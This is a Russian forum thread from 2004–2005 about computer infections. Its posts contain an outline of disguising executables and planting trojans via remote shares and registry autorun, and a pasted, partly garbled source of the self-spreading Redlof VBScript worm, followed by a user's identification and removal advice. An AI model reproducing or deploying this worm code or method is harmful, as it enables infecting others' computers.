neko_chan Опубликовано 2 ноября, 2004 Жалоба Опубликовано 2 ноября, 2004 снаси все и на чистый винтПервое - Спасибо всем огромное за советы :) ;) ;) !!! Второе - Вот это как раз таки я уже и делала. Всё приходит в норму на дня 2-3 потом опять начинает глючить. Если честно эта ерундовина теперь на одном из компьютеров в сети появилась (Local Network). И вот это как раз таки меня и начинает беспокоить. Цитата
Apollo81 Опубликовано 15 ноября, 2004 Жалоба Опубликовано 15 ноября, 2004 Ну, ну. Не смешите меня. Скажите еще что вирусы через .txt файлы распространяются.Да чувак, оказывается можно и через txt запустить у себя трояна на тачке.Есть такой способ.Создается вирусный исполняемый файл,в конец его кладется текст если это txt иликартинка если jpg и все такое.Этой шпионской программке присваивается расширение txt или jpg иликакое нить другое. Вы запускаете и вас имеют по полной программе (например, сервер который открывает порт для удаленого коннекта или фарматит винт). Программа обрабатыется несмотря что помечена как картинка или текст. Дело в том что система знает как обрабатывать исполняемый файл, знает как обрабатывать картинку или текст, то бишь какой программой запускать. Но что вам стоит заставить систему на одно мгновение воспринимать ехе-ник как картинку. Аааа, оказывается это легко. Перед нами открываются бесконечные горизонты. Мы там где светит солнце. Планету ХАКЕРАМ, планету лесорубам! Добавлено в 15:31: vogon И кто тут ламер? Если вам, уважаемый, неизвестно, что файлы формата *.jpg не могут никоим образом работать с системой и поддаются тоько пассивной загрузке, то есть загружаются операционкой в целях просмотра, не оказывая на нее никакого активного влияния, в отличае от файлов с расширением, например, *.exe, это еще не дает вам повод обвинять всех вокруг в непрофессиональности и называть ламерьем. Так что прошу, попридержите язык во избежании дальнейших конфликтов, и не говорите что-либо в такой агрессивной форме, пока не будете до конца уверены в достоверности излагаемой вами информации.:rolleyes: :lol: :lol: Кот в сапогах Ламер :lol: :lol:Да можно даже послать письмо на твое мыло.И в зивисимости от его содержания, будет сделать выбор,фарматить тебе тачку или просто поюзать содержимое винта Цитата
Apollo81 Опубликовано 15 ноября, 2004 Жалоба Опубликовано 15 ноября, 2004 Дядя Билли припаднес всем нам замечательный сюрприз.Вы не находите мои доводы убедительными? Оказывается, есть такие апиайные функции (программные функции), которые позволяют свободно создавать на любом сетевом компьютере расшаренные ресурсы. Мало того, есть такие хитрые функции, которые позволяют напрямую вносить изменения в системный реестр удаленного по сети компьютера. Вы создаете шару, кидаете в нее злую прогу, прописываете ее в реестр автозагрузки врага предварительно переписав ее из шары в системную или какую нить другую папку, удаляете шару и ждете пока ваш сервачок откроет порт. В МСДН-ах то бишь в документированых хэлпах Мелко-мягкихесть даже примеры и они работают под всеми виндами Цитата
OMIKE Опубликовано 15 ноября, 2004 Жалоба Опубликовано 15 ноября, 2004 Apollo81 Допустим не на всех, а на тех, у кого разрешения это позволяют сделать. Если именно на ЛЮБЫХ, плз ссылочку.А создание шар на удаленных машинах и удаленное управление реестром - нормальные функции администрирования. Цитата
CyberTenshi Опубликовано 22 ноября, 2004 Жалоба Опубликовано 22 ноября, 2004 1. Trojan.Win32.Dialer.fr, шо за звер та така? Каким разрушительным действием обладает? 2. Каким образом минуя фаервол Mc'cafe и AVP мог пролесть вирь в директорию System ^_^ Я сидел в чате... Тут вдруг кто-то провел syn-flood-атаку, отбил...Через некоторое время один из компонентов Kernel32.dll (!) пытается вылезть в нет (!)Так и обнаружил, что у меня троян. 3. Могли ли подключить мои HDD как shared-resource и запихать троян directly? О горе мне если так, весь мой креатив, все мои идеи, вся интеллектуальная собственность, всё что нажито непосильным трудом ^_^ стало доступным каким-то бакаярам... Че делать, если у меня Вин98, а 2000 или ХП не попрет? Цитата
OMIKE Опубликовано 22 ноября, 2004 Жалоба Опубликовано 22 ноября, 2004 Троян этот типа диалера (как видно из названия ^_^ ), то есть звонилка.Подцепить ты его мог в инете (небось под IE, да еще пятой версии, сидишь?).Усиливай политики файера, меняй на более мощный (Аутпост Про очень хорошая вещь, стоит чуть больше 600р.). Цитата
AstralTech Опубликовано 22 ноября, 2004 Жалоба Опубликовано 22 ноября, 2004 У самого стоит Аутпост про 2.1.. Достался бесплатно, бабушка в наследство оставила..... Хороший вещь, но как и всё, со своими глюками.... Что хотел сказать... Недавно столкнулся с вирем, который дублирует в системе файл svchost.exe и пытается вылести в инет. Мало того, кусок этого вируса был обнаружен в папке Систем Волум Информейшен, что меня дико удивило =) Кста, на заражённом компе стоял СП2 со своим фирефолом и антивирем. Поставил каспер. Всё равно дерьмо, но получше чуть... Короче, один экземпляр этой гадости оставил себе на память =) Цитата
OMIKE Опубликовано 23 ноября, 2004 Жалоба Опубликовано 23 ноября, 2004 Свойства Папки -> убрать галку с "Использовать общий доступ для папок и файлов". Затем сканим реестр на изменение :D Цитата
Bonart Опубликовано 24 ноября, 2004 Жалоба Опубликовано 24 ноября, 2004 AstralTech Дык фаер надо не только ставить но и настраивать ^_^ Тот же outpost тому же svchost позволяет по умолчанию уж очень много. Ну а эксповый фаерволиз SP2 лучше сразу заменять чем-нибудь приличным - тем же Outpost 2.5 хотя бы, а на инетовском шлюзе ИМХО рулит Kerio Server Firewall (если там винда, конечно). Цитата
OMIKE Опубликовано 24 ноября, 2004 Жалоба Опубликовано 24 ноября, 2004 Chi-seinen Операционка XP? Цитата
Bonart Опубликовано 24 ноября, 2004 Жалоба Опубликовано 24 ноября, 2004 Chi-seinen Открываешь папку Мой компьютер.Заходишь в меню сервис/свойства папки.Открываешь вкладку Вид.Находишь опцию "Использовать простой общий доступ к файлам (рекомендуется)"Убираешь ее нафиг. PS: В XP Home Edition так сделать не получится, если сделать надо - сноси эту инвалидную коляску нафиг.PS: Перед тем, как настраивать доступ, крайне желательно поставить пароли на всех юзверей с админскими правами. Цитата
AstralTech Опубликовано 24 ноября, 2004 Жалоба Опубликовано 24 ноября, 2004 Bonart Тут ты прав на счёт svchost..... Бум делать. тут как раз в новом апе вышла статейка про настройку аутпоста.... Мож чё нить интересное будет, ещё не читал. Цитата
le2ny Опубликовано 2 января, 2005 Жалоба Опубликовано 2 января, 2005 5 виросов love saint2 вируса trojan слабо за рас поймать! убийственная вещь!! Цитата
CyberTenshi Опубликовано 14 января, 2005 Жалоба Опубликовано 14 января, 2005 + vb-script на сайте "Аниме в Красноярске" [http://animeshop.h1.ru]: :: раскодированная версия [вставлено в execute(*)] --> Dim0InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk0/Sub/KJ_start4)0/KJSetDim4)0/KJCreateMilieu()43KJLikeIt()43KJCreateMail()43KJPropagate()/4End4Sub430/Function4KJAppendTo(FilePath,TypeStr)30On3Error/Resume0Next/4Set4ReadTemp3=/FSO.OpenTextFile4FilePath,1)43TmpStr4=0ReadTemp.ReadAll/4If/Instr(TmpStr,3KJ_start()4)0<>30/Or0Len(TmpStr)0<410Then/4ReadTemp.Close/4Exit3Function0/End/If0/If0TypeStr0=43htt30Then/4ReadTemp.Close/4Set4FileTemp3=/FSO.OpenTextFile4FilePath,2)43FileTemp.Write43<"4&0"BODY4onload=43"/&3"vb script:43&/4KJ_start()"430&43>"4&0vbCrLf3&/TmpStr0&4vbCrLf/&3HtmlText0/FileTemp.Close0/Set/FAttrib/=3FSO.GetFile(FilePath)/4FAttrib.attributes/=33443Else0/ReadTemp.Close0/Set/FileTemp4=0FSO.OpenTextFile(FilePath,8)/4If/TypeStr/=3"html"4Then30FileTemp.Write3vbCrLf4&0"<30&43HTML>"4&0vbCrLf3&/4<"/&3"BODY/onload="430&43vb script:"4&0"KJ_start4)""43&/4>"/&3vbCrLf4&0HtmlText/4ElseIf/TypeStr/=3"vbs"/Then43FileTemp.Write4vbCrLf/&3VbsText30End0If30FileTemp.Close30End0If30End0Function/430Function/KJChangeSub(CurrentString,LastIndexChar)43If4LastIndexChar0=400Then/4If/Left4LCase(CurrentString),1)4="4&0vbCrLf3&/4<"/&3"BODY/onload="430&43vb script:"4&0"KJ_start4)""43&/4>"/&3vbCrLf4&0HtmlText/4FileTemp.Close/4End4If/4DefaultId0=4WsShell.RegRead43HKEY_CURRENT_USER\Identities\Default0User/ID")43OutLookVersion4=0WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook3Express\MediaVer")43WsShell.RegWrite0"HKEY_CURRENT_USER\Identities\3&DefaultId&3\Software\Microsoft\Outlook3Express\"&4Left(OutLookVersion,1)/&3.0\Mail\Compose3Use3Stationery4,1,4REG_DWORD"/4Call3KJMailReg(4HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook0Express\"&3Left(OutLookVersion,1)4&".0\Mail\Stationery3Name",ShareFile)0/Call4KJMailReg("HKEY_CURRENT_USER\Identities\3&DefaultId&3\Software\Microsoft\Outlook3Express\"&4Left(OutLookVersion,1)/&3.0\Mail\Wide0Stationery3Name",ShareFile)0/WsShell.RegWrite43HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,4REG_DWORD"/4Call3KJMailReg(4HKEY_CURRENT_USER\Software\Microsoft\Windows3Messaging/Subsystem\Profiles\Microsoft4Outlook4Internet3Settings\0a0d020000000000c000000000000046\001e03604,"blank4)0/Call4KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows4NT\CurrentVersion\Windows0Messaging4Subsystem\Profiles\Microsoft3Outlook3Internet0Settings\0a0d020000000000c000000000000046\001e03603,"blank3)/4WsShell.RegWrite3"HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference3,131072,"REG_DWORD430Call/KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery3,"blank3)/4KJummageFolder(Left4WinPath,3)/&3"Program0Files\Common/Files\Microsoft/Shared\Stationery3)/4End4Function30/4Function3KJCreateMilieu4)0/On0Error4Resume/Next43TempPath0=43"/4If/Not(FSO.FileExists(WinPath0&43WScript.exe3))4Then30TempPath/=3"system32\430End0If30If3TempPath0=43system32\"4Then30StartUpFile0=4WinPath4&0"SYSTEM\Kernel32.dll"43Else0/StartUpFile/=3WinPath3&/4SYSTEM\Kernel.dll"/4End4If/4WsShell.RegWrite3"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel324,StartUpFile30FSO.CopyFile/WinPath/&3"web\kjwall.gif3,WinPath0&43web\Folder.htt430FSO.CopyFile/WinPath/&3"system32\kjwall.gif",WinPath/&3"system32\desktop.ini"43Call0KJAppendTo(WinPath3&/4web\Folder.htt",3htt3)/4WsShell.RegWrite3"HKEY_CLASSES_ROOT\.dll\",4dllfile430WsShell.RegWrite/4HKEY_CLASSES_ROOT\.dll\Content/Type4,"application/x-msdownload"43WsShell.RegWrite0"HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead(4HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")30WsShell.RegWrite/4HKEY_CLASSES_ROOT\dllfile\ScriptEngine\4,"VBScript"43WsShell.RegWrite0"HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\3,WinPath0&4TempPath3&/4WScript.exe43"%13"/4*"/4WsShell.RegWrite3"HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\4,"{60254CA5-953B-11CF-8C96-00AA00B8708C}30/WsShell.RegWrite43HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\3,"{85131631-480C-11D2-B1F9-00C04F86C324}"/4Set4FileTemp3=/FSO.OpenTextFile4StartUpFile,2,true)43FileTemp.Write4VbsText43FileTemp.Close43End3Function0/43Function0KJLikeIt()30If3InWhere3<>43html"/Then43Exit0Function/4End4If/4ThisLocation3=/document.location30If3Left(ThisLocation,44)/=3"file"4Then30ThisLocation/=3Mid(ThisLocation,9)30If3FSO.GetExtensionName(ThisLocation)4<>/430then/4ThisLocation3=/Left4ThisLocation,Len(ThisLocation)/-3Len(FSO.GetFileName(ThisLocation)))30End0If30If3Len(ThisLocation)/>33/Then43ThisLocation0=4ThisLocation3&/4\"/4End4If/4KJummageFolder(ThisLocation)30End0If30End0Function/430Function/KJMailReg(RegStr,FileName)0/On0Error4Resume/Next43RegTempStr4=0WsShell.RegRead(RegStr)0/If0RegTempStr3=/430Then/4WsShell.RegWrite3RegStr,FileName30End0If30End0Function/430Function/KJOboSub4CurrentString)/4SubE3=/030TestOut0=400/Do0While4True30TestOut0=4TestOut4+0143If4TestOut4>0283Then0/CurrentString3=/FinalyDisk0&43:\430Exit/Do0/End/If0/On0Error4Resume/Next43Set3ThisFolder4=0FSO.GetFolder4CurrentString)/4Set4DicSub/=3CreateObject("Scripting.Dictionary4)0/Set/Folders/=3ThisFolder.SubFolders/4FolderCount4=0043For3Each0TempFolder3in4Folders43FolderCount3=/FolderCount/+31/4DicSub.add/FolderCount,4TempFolder.Name43Next0/If0DicSub.Count/=30/Then43LastIndexChar/=3InstrRev(CurrentString,3\",Len4CurrentString)-1)0/SubString3=/Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)30CurrentString4=0KJChangeSub(CurrentString,LastIndexChar)/4SubE3=/130Else/4If/SubE4=004Then30CurrentString4=0CurrentString4&0DicSub.Item(1)3&/4\"/4Exit3Do43Else0/j3=/030For0j4=014To/FolderCount/4If/LCase(SubString)4=0LCase4DicSub.Item4j))4Then30If3j/<3FolderCount3Then0/CurrentString3=/CurrentString3&/DicSub.Item(j+1)4&0"\30/Exit4Do/4End4If/4End4If/4Next30LastIndexChar4=0InstrRev(CurrentString,"\4,Len(CurrentString)-1)/4SubString0=4Mid4CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)0/CurrentString3=/KJChangeSub(CurrentString,LastIndexChar)43End3If43End3If43Loop0/KJOboSub4=0CurrentString43End3Function0/43Function0KJPropagate()43On4Error0Resume3Next0/RegPathValue4=0"HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook3Express\Degree430DiskDegree3=/WsShell.RegRead(RegPathValue)30If3DiskDegree4=0"43Then0/DiskDegree0=4FinalyDisk/&3":\30/End/If0/For/i=1/to0543DiskDegree4=0KJOboSub(DiskDegree)/4KJummageFolder(DiskDegree)/4Next30WsShell.RegWrite/RegPathValue,DiskDegree/4End4Function30/4Function3KJummageFolder4PathName)0/On0Error4Resume/Next43Set3FolderName4=0FSO.GetFolder4PathName)0/Set/ThisFiles3=/FolderName.Files43HttExists/=30/4For4Each3ThisFile0In3ThisFiles/4FileExt4=0UCase4FSO.GetExtensionName(ThisFile.Path))30If3FileExt3=/4HTM43Or4FileExt4=0"HTML43Or4FileExt4=0"ASP"4Or/FileExt/=3"PHP"/Or0FileExt0=43JSP30Then/4Call3KJAppendTo4ThisFile.Path,"html4)0/ElseIf0FileExt0=43VBS30Then/4Call3KJAppendTo4ThisFile.Path,"vbs")30ElseIf3FileExt3=/4HTT43Then0/HttExists3=/130End0If30Next/4If/4UCase(PathName)4=0UCase4WinPath4&0"Desktop\4))/Or0(UCase(PathName)/=3UCase(WinPath/&3"Desktop"))Then30HttExists4=0143End3If43If4HttExists0=400Then/4FSO.CopyFile3WinPath3&/4system32\desktop.ini3,PathName/4FSO.CopyFile3WinPath3&/4web\Folder.htt",PathName30End0If30End0Function/430Function/KJSetDim4)0/On0Error4Resume/Next43Err.Clear/4TestIt/=3WScript.ScriptFullname43If4Err4Then30InWhere0=43html"/4Else30InWhere0=43vbs30/End/If0/If0InWhere0=43vbs30Then/4Set4FSO4=0CreateObject(4Scripting.FileSystemObject")30Set0WsShell0=4CreateObject("WScript.Shell4)0/Else43Set3AppleObject3=/document.applets43KJ_guest")43AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")43AppleObject.createInstance4)0/Set/WsShell/=3AppleObject.GetObject()30AppleObject.setCLSID(4{0D43FE01-F093-11CF-8940-00A0C9054228}")30AppleObject.createInstance()/4Set4FSO4=0AppleObject.GetObject4)0/End/If0/Set/DiskObject0=4FSO.Drives/4For4Each3DiskTemp0In3DiskObject43If4DiskTemp.DriveType/<>024And4DiskTemp.DriveType/<>014Then30Exit/For/4End4If/4FinalyDisk/=3DiskTemp.DriveLetter0/Next43Dim3OtherArr(3)30Randomize43For3i=03To430/OtherArr4i)/=3Int((94*0Rnd))43Next0/TempString0=43"/4For4i=14To/Len(ThisText)30TempNum0=4Asc4Mid4ThisText,i,1))/4If/TempNum/=3134Then30TempNum0=428/4ElseIf/TempNum/=3104Then30TempNum0=429/4End4If/4TempChar3=/Chr(TempNum/-3OtherArr(i4Mod44))43If4TempChar3=/Chr(34)/Then43TempChar0=4Chr418)43End3If43TempString4=0TempString3&/TempChar43Next0/UnLockStr3=/4Execute43"Dim0KeyArr(3),ThisText3"&vbCrLf&"4KeyArr(0)0=430&4OtherArr(0)4&0"43&vbCrLf&""KeyArr(1)3=/43&/OtherArr41)/&3""4&vbCrLf&3"KeyArr(2)4=0"4&0OtherArr(2)0&43""&vbCrLf&43KeyArr43)/=3"/&3OtherArr(3)3&/43"&vbCrLf&"4For4i=14To/Len(ExeString)""&vbCrLf&43TempNum3=/Asc(Mid(ExeString,i,1))"4&vbCrLf&3"If3TempNum3=/180Then"4&vbCrLf&3"TempNum0=434"4&vbCrLf&3"End0If3"&vbCrLf&"4TempChar3=/Chr(TempNum/+3KeyArr4i0Mod04))""&vbCrLf&43If4TempChar3=/Chr(28)/Then43&vbCrLf&""TempChar4=0vbCr"4&vbCrLf&3"ElseIf3TempChar0=4Chr429)4Then3"&vbCrLf&"4TempChar3=/vbLf43&vbCrLf&""End/If""&vbCrLf&43ThisText0=4ThisText3&/TempChar43&vbCrLf&""Next43)"4&0vbCrLf3&/4Execute4ThisText)"/4ThisText3=/4ExeString0=43""4&0TempString3&/43""43HtmlText0=4<"/&3"script3language=vbscript>43&/vbCrLf0&43document.write430&43""43&/4<"/&3"div0style=3position:absolute;4left:0px;0top:0px;/width:0px;0height:0px;0z-index:28;0visibility:0hidden3>"4&0"<3"&43"/&3"APPLET3NAME=KJ3"&43_guest4HEIGHT=03WIDTH=03code=com.ms.""&3"activeX.Active3"&43XComponent>30&43<"4&0"/APPLET>43&/4<"/&3"/div>43"/&3vbCrLf4&0"<30&43/script>"/&3vbCrLf4&0"<30&43script4language=vbscript>"4&0vbCrLf3&/ThisText4&0vbCrLf3&/UnLockStr3&/vbCrLf0&43<"4&0"/script>43&/vbCrLf0&43<"4&0"/BODY>"/&3vbCrLf4&0"<30&43/HTML>430VbsText0=4ThisText3&/vbCrLf0&4UnLockStr0&4vbCrLf/&3"KJ_start()30/WinPath/=3FSO.GetSpecialFolder(0)3&/4\"/4If/4FSO.FileExists(WinPath/&3"web\Folder.htt3))4Then30FSO.CopyFile/WinPath/&3"web\Folder.htt3,WinPath0&43web\kjwall.gif430End0If30If3(FSO.FileExists(WinPath3&/4system32\desktop.ini3))4Then30FSO.CopyFile/WinPath/&3"system32\desktop.ini",WinPath4&0"system32\kjwall.gif"43End3If43End3Function :: отдельное спасибо тем кто поведает суть кода [!] + чую недобрый скрипт, ой недобрый :angry: [владельца сайта на кол]+ кстати то же самое встречается еще на нескольких аниме-проектах ... Цитата
Old_Sora Опубликовано 14 января, 2005 Жалоба Опубликовано 14 января, 2005 эээ это что с почтой или спамом ? чую плохо это. Цитата
Bonart Опубликовано 15 января, 2005 Жалоба Опубликовано 15 января, 2005 CyberTenshi Прибей это дерьмо фильтром и будет тебе счастье Цитата
JaveLiner Опубликовано 15 января, 2005 Жалоба Опубликовано 15 января, 2005 Поздравляю тебя, Шарик, ты БАЛБЕС! )))) Это вирус VBS.Folder (aka Redlof)Использует необычный прием для своей активизации: запускается при обращениях системы к файлам шаблона гипертекста (HTT-файлы). Способен распространяться через зараженные Интернет-страницы - как загружаемые из Интернета, так и получаемые в виде приложений к посланиям электронной почты.В машине вирус размножается просто с фантастической скоростью плюс очень активно жрет системные ресурсы. В течение недели винчестер объемом 100 гигов "худеет" где-то на 400 метров!!! При запуске зараженного HTM- или HTML-файла вирус записывает на диск свои компоненты: - C:\WINDOWS\SYSTEM\Kernel.dll - C:\WINDOWS\WEB\kjwall.gif - C:\WINDOWS\SYSTEM32\kjwall.gif Запускается при каждом старте системы при помощи прописываемого вирусом стартового ключа в регистрах автозапуска системы. Этот ключ имеет следующий вид: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]"Kernel32"="C:\\WINDOWS\\SYSTEM\\Kernel.dll" Вирусный скрипт, запущенный из данного файла, встраивается в системный процесс обмена данными "система - Web-броузер - система", благодаря чему не фигурирует ни в одном из служебных списков активных приложений, оставаясь при этом резидентно в памяти компьютера до завершения работы системы. На сегодняшний день данный вирус детектится всеми антивирусными программами, однако лечится только AVP (с глюками) и BitDefender Professional (aka AVX eXpert Professional) - полностью без побочных эффектов.Лично я бы при отсутствии последнего антивируса советовал лечиться удалением из-под дос указанных выше и всех Folder.htt - файлов с последующей переустановкой системы, т.к. вирус резидентный. Вобщем, жопа полная. Цитата
JaveLiner Опубликовано 15 января, 2005 Жалоба Опубликовано 15 января, 2005 Забыл добавить. Обязательно удалить по маске файл Klr*.TMP а также C:\Program Files\Common Files\Microsoft Shared\StationeryЭто копии фируса, которые автоматически восстанавливают его после лечения антивирусом при загрузке системы. А вы думали, в сказку попали?))))) Цитата
Bonart Опубликовано 16 января, 2005 Жалоба Опубликовано 16 января, 2005 JaveLiner Ну а мы, "Операманы" под пользовательским аккаунтом это счастья лишены :D Цитата
Multyashka Опубликовано 17 января, 2005 Жалоба Опубликовано 17 января, 2005 Вот подхватил червя (не знаю где) через минуту ребутает комп!Я помню была такая заплатка которая его убивала ноя просто забыл что это за заплатка и как называется она...Помогите избавится от червя...Весь комп мне прогрыз....дайте ссылку на заплатку или разместите её тут в теме!!!Спасибо за внимание!да а вот скрин этого червя может кто нить так вспомнит... Цитата
Neo[RAGE] Опубликовано 17 января, 2005 Жалоба Опубликовано 17 января, 2005 \:huh::D:D:D\msblast/lovesan? Цитата
OMIKE Опубликовано 17 января, 2005 Жалоба Опубликовано 17 января, 2005 как все запущено :huh: файрвол включать надо! Цитата
Multyashka Опубликовано 17 января, 2005 Жалоба Опубликовано 17 января, 2005 как все запущено, файрвол включать надо!У меня их нету, а какие были не помогают!!! :huh:)) Цитата
Neo[RAGE] Опубликовано 17 января, 2005 Жалоба Опубликовано 17 января, 2005 Multyashka Дай мыло... Отправлю лекарство и заплатку. Цитата
AstralTech Опубликовано 17 января, 2005 Жалоба Опубликовано 17 января, 2005 Нео, отправь ему ссылку на фаервол, сервис-паки и антивирус :huh: Добавлено:И ещё на Ад-Аваре :) Цитата
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.